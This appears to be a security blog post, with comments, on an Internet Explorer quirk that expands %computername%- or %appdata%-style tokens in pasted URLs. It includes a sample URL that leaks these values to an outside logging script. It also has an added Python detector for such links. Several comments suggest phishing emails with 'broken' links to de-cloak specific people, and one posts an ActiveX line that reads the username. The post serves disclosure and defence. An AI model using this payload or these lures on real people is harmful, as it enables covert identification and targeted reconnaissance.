web application security lab

De-cloaking in IE7.0 Via Windows Variables

Update: Tyler Reguly told me that you actually can get this working in IE8.0 but it needs to be part of a path. So I updated the example below so that it works in both.

One of the things Josh and I talked about during our preso was a way to get people to disclose their usernames and their machine names using a simple URL. Well, it turns out that in IE7.0 if you cut and paste something with a %…% in it, the token is translated into the value of that OS environment variable. So if you include something like %computername% or %appdata% or the like, you’ll end up with machine names and full paths to the user’s home directory. That can be super helpful for de-cloaking. Please note this only works in Internet Explorer. Here’s an example:

http://ha.ckers.org/log.cgi/rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz

If you cut and paste that, it will be translated on the fly before it is sent. So you’d use this either just as you see above, as a URL that must be cut and pasted to be used, or as something like a broken link that is obviously easy to reconstruct by changing one letter or removing a space. I never did find a way to get this to fire automatically. I tried CSS, images, iframes, frames, Word docs, PDFs, and on and on. If someone figures out a way to make it fire automatically without user interaction, that would make this a lot more useful. Either way, it seemed worthy of a post.
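As an added illustration, not code from the original post, here is a small Python check a defender might run over links arriving in mail or forum posts: it flags %NAME% tokens that cannot be valid URL escapes, ranks them against a list of identity-revealing Windows variables, and simulates the paste-time expansion with a constructed environment so you can see what the receiving server would log. The variable list, the sample environment values and the leave-unknown-names-alone expansion rule are assumptions of this example.

```python
import re
from typing import Dict, List

# Added example, not code from the post. Windows variables whose expanded
# values identify a user or machine (list is an assumption for this example).
SENSITIVE_VARS = {
    "computername", "username", "userdomain", "userprofile", "appdata",
    "localappdata", "homepath", "homedrive", "logonserver", "temp", "tmp",
}

# A %NAME% reference. A valid URL escape is %XX with two hex digits, so a
# token that starts with a letter or underscore is never legitimate encoding.
TOKEN_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*)%")


def find_env_tokens(url: str) -> List[str]:
    """Variable names referenced by %NAME% tokens, left to right and
    non-overlapping, the way an expander consumes them."""
    return [m.group(1).lower() for m in TOKEN_RE.finditer(url)]


def sensitive_tokens(url: str) -> List[str]:
    """Subset of tokens that would leak user or machine identity if pasted
    into an IE address bar; a non-empty result means the link deserves a look."""
    return [t for t in find_env_tokens(url) if t in SENSITIVE_VARS]


def expand_like_ie(url: str, env: Dict[str, str]) -> str:
    """Case-insensitive %NAME% expansion; names not in env are left untouched
    (the ExpandEnvironmentStrings behaviour assumed here)."""
    lookup = {k.lower(): v for k, v in env.items()}
    return TOKEN_RE.sub(lambda m: lookup.get(m.group(1).lower(), m.group(0)), url)


if __name__ == "__main__":
    # The post's own URL, plus a constructed XP-era environment (sample values).
    link = "http://ha.ckers.org/log.cgi/rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz"
    env = {"COMPUTERNAME": "WS-EXAMPLE01",
           "APPDATA": r"C:\Documents and Settings\jdoe\Application Data"}
    print("tokens:", find_env_tokens(link))        # ['appdata', 'computername']
    print("sensitive:", sensitive_tokens(link))
    print("what the server would log:", expand_like_ie(link, env))
```

The same token check applies to link text in an outbound mail filter or a forum post sanitizer, since a bare %NAME% in a URL is never produced by normal percent-encoding.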

15 Responses to “De-cloaking in IE7.0 Via Windows Variables”

  1. ChosenOne Says:

    wow, nice find.

  2. rvdh Says:

    Interesting, I could get it to work here, but that might be due to my settings or emulation mode.

    Maybe you can try to bind a label through the FOR attribute?

    as in: http://rvdh.ath.cx/?i=310

    Maybe it gives some more control.

  3. Angel one Says:

    I don’t actually have a machine running IE7, so I can’t test this, but would just embedding it in an img tag work?

  4. Angel one Says:

    Apparently this works in IE6 as well (which means I can test it because I do have one windows machine with IE6). img tags and embedding it in iframes don’t work.

  5. Wornstrom Says:

    I think this is specifically part of the “paste into address bar” logic, intended for copying things into Explorer in file browser mode. I used that often, never thought to try it in IE.

  6. Robert A. Says:

    Silly Microsoft. Good find.

  7. anon Says:

    // JScript in IE: WScript.Shell is an ActiveX object, so this only runs where ActiveX is permitted
    var shell = new ActiveXObject("WScript.Shell");
    alert(shell.ExpandEnvironmentStrings("%USERNAME%"));

    This works, you just have to get someone to trust you enough to run the ActiveXObject or stupidly turn down their security settings.

    I also tried it with XSS / AJAX and invisible redirecting (with the header( “Location:” ) command in PHP) to no avail. It’s the copy/paste magic, like you’ve said, that allows this to happen (mainly). Too bad.

  8. anon Says:

    the above script is in Javascript, btw (comments with tags are stripped, instead of entified, not a bad idea, haha).

  9. Vinícius K-Max Says:

    Yes, working in IE6 too. Veeeeery old bug, btw.

  10. gnarlysec Says:

    This sounds perfect for doing detailed reconnaissance on a specific person. All you would have to do is send them an email with a broken link in it. Under the link, say “Link not working? copy and paste this into your address bar” and boom! they’ll do it and the server logs the expanded environment variables.

  11. Nephi Johnson Says:

    Would be perfect for helping discover additional information about a specific person. Just have to send them an email with a broken link with “Link not working? Copy and paste this into your address bar” below it.

  12. Mr.N Says:

    Nice find. Probably the easiest way to get someone to trigger it would be to post it on some social network site or forum as an unlinked URL (one that didn’t automatically convert URLs to links). Does it work if you encode it, or does the operating system not know what to do with that? Also of note, JavaScript in IE supports Object.execCommand("copy") and Object.execCommand("paste"); does the translation happen in any circumstance using those calls? I don’t think you can call them against the address bar, but you might give it a shot (I don’t have time atm or I’d do it myself).

  13. Paul Says:

    This is interesting. Silly Microsoft! The following piece of JavaScript will prompt with a security alert about enabling an ActiveX control:

    window.location.href = 'http://google.com/%USERNAME%';

  14. Watari Says:

    Gee whiz. It works in IE8 too. You switch to “work offline” to keep from posting.

  15. pushkar bhatkoti Says:

    Yupppp, it works perfectly. Shame on Microsoft.
    I’m a Firefox lover and heyyyy, no scripting

    -push bhatkoti